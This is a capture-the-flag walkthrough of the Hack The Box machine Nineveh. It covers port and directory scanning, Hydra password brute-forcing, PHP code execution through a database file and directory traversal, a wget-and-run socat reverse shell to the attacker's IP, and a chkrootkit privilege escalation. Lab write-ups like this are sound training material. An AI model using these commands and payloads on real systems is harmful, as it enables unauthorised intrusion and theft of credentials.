Difficulty Rating:

Machine: Nineveh
OS: Linux
Target IP: 10.10.10.43/44/45
Source IP: 10.10.15.8

  • Nmap TCP Scan
$ nmap -A -sV -Pn 10.10.10.45

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-05 12:11 IST
Nmap scan report for 10.10.10.45
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.62 seconds
  • Dirsearch
$ python3 dirsearch.py -u https://10.10.10.43 -w /usr/share/wordlists/dirb/common.txt -e php

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 4614

Error Log: /home/anton/dirsearch/logs/errors-17-08-05_14-41-05.log

Target: https://10.10.10.43

[14:41:06] Starting: 
[14:41:09] 200 -   49B  - /
[14:41:09] 403 -  291B  - /.hta
[14:42:32] 301 -  309B  - /db  ->  https://10.10.10.43/db/
[14:43:30] 200 -   49B  - /index.html
[14:45:34] 403 -  300B  - /server-status

Task Completed

$ python3 dirsearch.py -u https://10.10.10.43/db -w /usr/share/wordlists/dirb/common.txt -e php

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 4614

Error Log: /home/anton/dirsearch/logs/errors-17-08-05_14-47-06.log

Target: https://10.10.10.43/db

[14:47:07] Starting: 
[14:47:10] 200 -   11KB - /db/
[14:47:11] 403 -  294B  - /db/.hta
[14:49:42] 200 -   11KB - /db/index.php

Task Completed
  • Hydra
$ hydra -l true -P /usr/share/wordlists/rockyou.txt nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=^USER^:Incorrect password." -t 64  
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-05 17:02:39
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~3502 tries per task
[DATA] attacking service http-post-form on port 443 with SSL
[STATUS] 834.00 tries/min, 834 tries in 00:01h, 14343565 to do in 286:39h, 64 active
[443][http-post-form] host: nineveh.htb   login: true   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-05 17:04:29
  • Vulnerability is that when new database is created, it is created as a new file. So if we create a database with any name and .php and extension, we can treat it as php file.
  • After logging in, create a database with name ninevehNotes.php.
    • Create 1 table with any name and 1 row
    • Enter any name for the field.
    • Set type to TEXT.
    • Default value will be the payload in php
  • Dirsearch on http://10.10.10.43
$ python3 dirsearch.py -u http://10.10.10.43/department/ -w /usr/share/wordlists/dirb/common.txt -e php -t 100 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 100 | Wordlist size: 4614

Error Log: /home/anton/dirsearch/logs/errors-17-08-12_18-26-45.log

Target: http://10.10.10.43/department/

[18:26:46] Starting: 
[18:26:47] 200 -   68B  - /department/
[18:26:47] 403 -  301B  - /department/.hta
[18:26:57] 301 -  319B  - /department/css  ->  http://10.10.10.43/department/css/
[18:27:00] 301 -  321B  - /department/files  ->  http://10.10.10.43/department/files/
[18:27:02] 200 -   68B  - /department/index.php

Task Completed

$ python3 dirsearch.py -u http://10.10.10.43/department/files -w /usr/share/wordlists/dirb/common.txt -e php -t 100

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 100 | Wordlist size: 4614

Error Log: /home/anton/dirsearch/logs/errors-17-08-12_18-30-35.log

Target: http://10.10.10.43/department/files

[18:30:36] Starting: 
[18:30:38] 403 -  307B  - /department/files/.hta
[18:30:39] 200 -   68B  - /department/files/
[18:30:53] 200 -   68B  - /department/files/index.php

Task Completed
  • Visit http://10.10.10.43/department/login.php
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.45 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" -t 64 
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-12 18:35:29
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~3502 tries per task
[DATA] attacking service http-post-form on port 80
[STATUS] 2072.00 tries/min, 2072 tries in 00:01h, 14342327 to do in 115:22h, 64 active
[80][http-post-form] host: 10.10.10.45   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-12 18:38:03
  • http://10.10.10.43/manage.php is vulnerable to Directory Traversing
  • Value of parameter notes will be path to the payload. http://10.10.10.43/manage.php?notes=/var/tmp/ninevehNotes.php

Note: Name of payload should have string ninevehNotes as it is whitelisted in manage.php source code.

  • Run socat on attacker’s machine

$ socat file:`tty`,echo=0,raw tcp-listen:31337

  • Download socat binary and place it /var/www/html and download it on victim machine: $ wget 10.10.15.8/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.8:31337

To own user

$ wget https://nineveh.htb/secure_notes/nineveh.png --no-check-certificate
  • View the contents of the file
  • It contains private key for user amrois
  • Connect using ssh
$ ssh -i nineveh_key.txt [email protected]

Note: SSH cannot be run from outside. Hence the IP will have to be 127.0.0.1 or localhost.

  • View the contents of /report directory
  • The report is the output of chkrootkit
Exploit for chkrootkit
  • Create a file /tmp/update containing payload
[email protected]:~$ cat /tmp/update
cat /root/root.txt > /home/amrois/pass; chmod +r /home/amrois/pass
[email protected]:~$ ls 
user.txt
[email protected]:~$ chmod +x /tmp/update
[email protected]:~$ ls -la /tmp/update
-rwxrwxr-x 1 amrois amrois 67 Aug 12 15:20 /tmp/update
[email protected]:~$ ls
user.txt
[email protected]:~$ ls
pass  user.txt
[email protected]:~$ cat pass
XXXXXXXXXXXX
[email protected]:~$ 
User and Root owned!!

Share the fun!